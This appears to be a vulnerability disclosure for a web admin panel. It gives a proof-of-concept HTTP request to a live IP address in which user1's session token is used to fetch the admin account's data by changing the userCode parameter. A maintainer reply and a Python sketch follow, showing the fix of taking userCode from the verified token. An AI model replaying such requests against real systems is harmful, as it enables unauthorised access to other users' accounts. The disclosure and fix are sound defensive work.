Log in with the user1 account on the trial website given by the author, and click the personal center to capture the package.
The userCode parameter has a vulnerability.
poc:
user1 login --> /api/user/userData?userCode=admin
GET /api/user/userData?userCode=admin HTTP/1.1
Host: 8.129.86.120
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
myadmin-token: eyJhbGciOiJIUzI1NiJ9.eyJqdGkiOiIxOCIsImlzcyI6InVzZXIxIiwic3ViIjoie1wiZGVwdExpc3RcIjpbNyw4XSxcImRlcHROYW1lc1wiOltcIua3seWcs-i9r-S7tumDqFwiLFwi5YyX5Lqs6L-Q57u06YOoXCJdLFwicm9sZUxpc3RcIjpbNl0sXCJyb2xlTmFtZXNcIjpbXCLova_ku7bpg6jmgLvnm5FcIl0sXCJ1c2VyQ29kZVwiOlwidXNlcjFcIixcInVzZXJJZFwiOjE4LFwidXNlck5hbWVcIjpcIueUqOaItzFcIn0iLCJpYXQiOjE2Mjc0NTE0NzYsImV4cCI6MTYyNzQ1NTA3Nn0.e5q0BKsAo2Q_gXCnAZGn_njPV0oRQoVJKiMJeLDwMvQ
Connection: close
Referer: http://8.129.86.120/
Cookie: sidebarStatus=1; myadmin-token=eyJhbGciOiJIUzI1NiJ9.eyJqdGkiOiIxOCIsImlzcyI6InVzZXIxIiwic3ViIjoie1wiZGVwdExpc3RcIjpbNyw4XSxcImRlcHROYW1lc1wiOltcIua3seWcs-i9r-S7tumDqFwiLFwi5YyX5Lqs6L-Q57u06YOoXCJdLFwicm9sZUxpc3RcIjpbNl0sXCJyb2xlTmFtZXNcIjpbXCLova_ku7bpg6jmgLvnm5FcIl0sXCJ1c2VyQ29kZVwiOlwidXNlcjFcIixcInVzZXJJZFwiOjE4LFwidXNlck5hbWVcIjpcIueUqOaItzFcIn0iLCJpYXQiOjE2Mjc0NTE0NzYsImV4cCI6MTYyNzQ1NTA3Nn0.e5q0BKsAo2Q_gXCnAZGn_njPV0oRQoVJKiMJeLDwMvQ
This problem does exist. In this case, the userCode should be parsed and obtained from the token, rather than passed through parameters. Thanks for reminding.
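The fix described in the reply, sketched as an added example (not the project's own code): the handler takes the caller's userCode from the verified `myadmin-token` and never uses the `userCode` query parameter for the lookup. The signing key, the user store, the function names and the choice to answer a mismatch with 403 are assumptions; the token layout (HS256, identity as JSON inside `sub`) follows the request above.

```python
import base64, hashlib, hmac, json, time
from urllib.parse import parse_qs, urlparse

SECRET = b"constructed-demo-key"  # assumption: the real signing key is not on the page
USERS = {"user1": {"userName": "User 1"}, "admin": {"userName": "Administrator"}}  # constructed

def b64d(part):
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))

def b64e(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def issue_token(user_code, ttl=3600):
    """Build a constructed HS256 token shaped like the one in the request."""
    now = int(time.time())
    head = b64e(json.dumps({"alg": "HS256"}).encode())
    claims = {"iss": user_code, "sub": json.dumps({"userCode": user_code}),
              "iat": now, "exp": now + ttl}
    body = b64e(json.dumps(claims).encode())
    sig = hmac.new(SECRET, f"{head}.{body}".encode(), hashlib.sha256).digest()
    return f"{head}.{body}.{b64e(sig)}"

def user_code_from_token(token):
    """Return userCode from a token whose signature and expiry check out, else None."""
    try:
        head, body, sig = token.split(".")
        if json.loads(b64d(head)).get("alg") != "HS256":  # pin the algorithm
            return None
        expected = hmac.new(SECRET, f"{head}.{body}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, b64d(sig)):
            return None
        claims = json.loads(b64d(body))
        if claims["exp"] < time.time():
            return None
        return json.loads(claims["sub"])["userCode"]
    except (ValueError, KeyError, TypeError, AttributeError):
        return None  # malformed token: treat as unauthenticated

def user_data(url, headers):
    """Handler for /api/user/userData; returns (status, body)."""
    caller = user_code_from_token(headers.get("myadmin-token", ""))
    if caller is None or caller not in USERS:
        return 401, None
    requested = parse_qs(urlparse(url).query).get("userCode", [caller])[0]
    if requested != caller:  # parameter is never used for lookup; a mismatch is refused
        return 403, None
    return 200, USERS[caller]
```

Logging each 403 from this handler together with the token's userCode records attempts to read another account's data.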